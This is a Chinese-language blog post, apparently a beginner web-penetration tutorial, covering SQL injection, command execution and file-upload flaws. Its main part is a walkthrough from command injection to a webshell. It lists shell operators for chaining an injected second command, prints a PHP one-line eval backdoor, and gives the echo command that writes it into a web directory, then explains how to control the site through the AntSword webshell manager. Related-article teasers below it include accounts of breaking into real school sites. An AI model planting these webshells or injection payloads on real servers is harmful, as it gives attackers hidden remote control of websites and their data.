Web渗透之常见的网站攻击方式

最新推荐文章于 2024-04-23 10:05:03 发布
最新推荐文章于 2024-04-23 10:05:03 发布
阅读量930 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56632799/article/details/128476304
版权

常见的网站漏洞有哪些?

SQL注入:泄露破坏数据库,数据库中可能有账号密码等敏感信息

命令执行:获取目标机器命令权限,执行非法命令,破坏或控制受害机

文件上传:上传后门病毒木马到网站中,破坏网站甚至系统

从命令执行漏洞到getshell

cmd1|cmd2:无论cmd1是否执行成功,cmd2将被执行

cmd1;cmd2:无论cmd1是否执行成功,cmd2将被执行

cmd1&cmd2:无论cmd1是否执行成功,cmd2将被执行

cmd1||cmd2:仅在cmd1执行失败时才执行cmd2

cmd1&&cmd2:仅在cmd1执行成功后,cmd2将被执行

写入网站后门-webshell

webshell是什么:webshell是以asp,php,jsp或者cgi等网页文件形式存在的一种命令执行环境,也可将其称做为一种网页后门。黑客在入侵一个网站后,通常会将asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,以达到控制网站服务器的目的。

PHP一句话木马

                <?php eval($_POST['cmd']);?>

/eval  eval是php的语言构造器,作用是把字符串作为PHP代码执行

/$_POST['cmd']  以POST请求方式接收请求参数cmd

1.上传到哪? 常用命令:pwd dir  /var/www/html/vulnerabilities/exec

2.怎么上传? echo命令:echo“<?php eval(\$_POST['cmd']);?>"  > 1.php  指定内容到1.php

3.怎么访问? http://your_ip/vulnerabilities/exec/1.php

4.怎么使用木马?/ hackbar:浏览器插件,可以直接在浏览器中修改POST data

                            /webshell管理器:如蚁剑,菜刀都可以自动连接

蚁剑的使用方式

1.右键添加数据

2.添加数据

/url地址:webshell访问地址

/连接密码:webshell[ ] 包裹的字符串

3.连接webshell,控制网站

 

刚子116
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
WEB常见攻击与渗透测试
06-06
WEB常见攻击与渗透测试
网站常见攻击方法
hellomy的专栏
09-24 2069
SQL 注入 SQL注入攻击的核心在于让Web服务器执行攻击者期望的SQL语句,以便得到数据库中的感兴趣的数据或对数据库进行读取、修改、删除、插入等操作,达到其邪恶的目的。而如何让Web服务器执行攻击者的SQL语句呢?SQL注入的常规套路在于将SQL语句放置于Form表单或请求参数之中提交到后端服务器,后端服务器如果未做输入安全校验,直接将变量取出进行数据库查询,则极易中招。 举例如下:对于一个根据用户ID获取用户信息的接口,后端的SQL语句一般是这样: select name,[...] from
用Python做安全测试攻击实战
测试萌萌
05-24 2126
在本文中,我们将使用Python进行一次安全测试的实战演练,目标是找出并利用应用程序的安全漏洞。请注意,这个演练仅用于教育和研究目的,切勿将这些技术用于非法活动。 注意:未经授权的攻击是违法的。确保你在拥有明确权限的环境中执行这些攻击,例如在你自己的应用或经过明确授权的应用上进行。
web渗透必备技术
04-11
有关web网站渗透的必备技术。适合初学者学习,提高。
Web网站渗透
Home to come
06-18 1325
1.无论bai什么站,无论什么语言,我要渗透,第du一件事就是扫目录,最好一下扫出zhi个上传点,直接上传shell,诸dao位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多! 2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件; 3.asp(aspx)+ACCESS拿shell一般只有3种方法,一是前台上传或者注入
Web渗透(一)
aqbj888的博客
02-23 421
Web渗透(一) Web渗透经典流程 判断脚本系统,判断数据库类型——>寻找注入点——>猜解数据库表名——>猜解字段名——>猜解用户名和密码——>寻找后台地址登录,获得网站管理权限(webshell) 常见漏洞 注入漏洞 URL为:asp?id= asp...
WEB渗透测试在线网站
zhaogang_1987的博客
01-14 2403
web渗透测试在线网站 国外 1、bWAPP 免费和开源的web应用程序安全项目。它有助于安全爱好者及研究人员发现和防止web漏洞。 地址:http://www.itsecgames.com/ 2、Damn Vulnerable iOS App (DVIA) DVIA是一个iOS安全的应用。它的主要目标给移动安全爱好者学习iOS的渗...
渗透测试综合实验(迂回渗透,入侵企业内网并将其控制为僵尸网络)
yyj1781572的博客
04-06 1508
内网渗透测试
超全的Web渗透自我学习资料合集(64篇).zip
09-30
超全的Web渗透学习资料合集,共64篇。 web渗透: web安全原则 web渗透: web渗透测试清单 web渗透: 自动化漏洞扫描 web渗透: Google Hacking web渗透: web服务器指纹识别 ...web渗透: 常见的WAF绕过方法
web渗透系列教学下载共64份.zip
12-30
web渗透--12--浏览器缓存攻击测试.pdf web渗透--13--目录遍历文件包含测试.pdf web渗透--14--目录浏览漏洞测试.pdf web渗透--15--越权漏洞.pdf web渗透--16--任意文件下载.pdf web渗透--17--跨站请求伪造(CSRF)....
Web渗透技术及实战案例解析第2版》
08-26
本书最大的特色是实用性高、实战性强、思维灵活,内容主要包括Web渗透必备技术、常见的加密与解密攻击、Web漏洞扫描、常见的文件上传漏洞及利用、SQL注入漏洞及利用、高级渗透技术、Windows和Linux提权、Windows和...
WEB应用安全攻击与防范培训.ppt
07-22
WEB应用安全攻击与防范培训教程,包括各种常见web攻击方式及防范方法。超过百页的PPT教程,最全的WEB攻击与防范PPT教程
web网络安全——网站入侵(一)
lv小笨鸟要先飞啦
12-18 1万+
前言:哈哈哈,Mark,硕士入学以来第一个渗透成功的网站,成功脱裤。都说研究生生活苦,确实是,从接到入侵网站都入侵成功整整半个月,纯属运气,首先网站很low,其次本人运气好,废话不多说,直接上过程。 入侵一般步骤  查询网站被入侵记录 查询途径:https://www.hac-ker.net/search.php?var=Heihu&page=3 https://www.se
web渗透测试在线网站
热门推荐
rulerer的博客
06-21 2万+
国外1、bWAPP免费和开源的web应用程序安全项目。它有助于安全爱好者及研究人员发现和防止web漏洞。地址:http://www.itsecgames.com/2、Damn Vulnerable iOS App (DVIA)DVIA是一个iOS安全的应用。它的主要目标给移动安全爱好者学习iOS的渗透测试技巧提供一个合法的平台。APP涵盖了所有常见的iOS安全漏洞,它免费并开放源码,漏洞测试和解决...
渗透测试技术----常见web漏洞--跨站脚本攻击原理及防御
wwl012345的博客
08-16 2268
一、跨站脚本攻击介绍 1.跨站脚本攻击简介 跨站脚本攻击(Cross-Site Scripting)简称为XSS(本来为CSS,但是与前端语言CSS容易产生歧义,故取名为XSS),XSS是一种针对于网站应用程序(Web客户端)的安全漏洞攻击技术,是代码注入的一种,它允许攻击者将恶意JS代码注入到网页,这样其他用户在访问网页时就会受到影响。攻击者利用XSS代码攻击成功后,可能得到一些高权限来执行一...
入侵网页html服务器,Web渗透入侵思路(脑图)| 内附彩蛋
weixin_30296797的博客
07-07 1134
一、查找注入,注意二、查找XSS,最近盲打很流行,不管怎样我们的目的是进入后台。三、查找上传,一些能上传的页面,比如申请友链、会员头像、和一些敏感页面等等,注意查看验证方式是否能绕过,注意结合服务器的解析特性,比如典型的IIS6.0、Apache等。四、查找编辑器,比较典型的ewebeditor、fckeditor等等。五、查找phpmyadmin等管理程序,可以尝试弱口令,或者寻找其六、百度、谷...
web网络安全——网站入侵(二)
lv小笨鸟要先飞啦
12-21 8491
成功例子分析(主要介绍非技术渗透步骤):某学院(难度很小的一类学校) http://XX.XX.XX.XX/ 1) 查看网站框架:chrome F12抓包分析:根据抓包Header中会有一部分网站信息, 网站框架:VWebServer/6.0.0 Apache Tomcat/6.0.29 6.0.43(后续查看网页源代码,报错页面显示信息) 2) 查看网页源代码: 注释:Cust
web网络安全——网站入侵(三)
lv小笨鸟要先飞啦
12-21 3967
2) 详细信息分析 联系人信息分析: https://github.com/XX.XX.XX.XX?language=objective-c&tab=stars 结论:网站由ruby编写,根据博主个人转载发表日志。 Nginx漏洞分析: 查询得出cve-2013-4547、cve-2014-3616漏洞利用可能性最高 利用分析: Cve-2014-3616 参考资料链接: ht
vue2 顶象 安全 验证码的使用
最新发布
lele66688888的博客
04-23 309
类似与这样的登录之前的验证 滑动一个盒子了 或者是 顺序点击文字了 等。
web渗透教程.pdf
09-05
web渗透教程.pdf》是一本关于Web渗透测试的教程,内容涵盖了Web渗透测试的基础知识、攻击技术、工具使用等方面的内容。 该教程从初学者角度出发,详细介绍了Web渗透测试的基本概念和流程。首先介绍了Web应用的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

刚子116

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值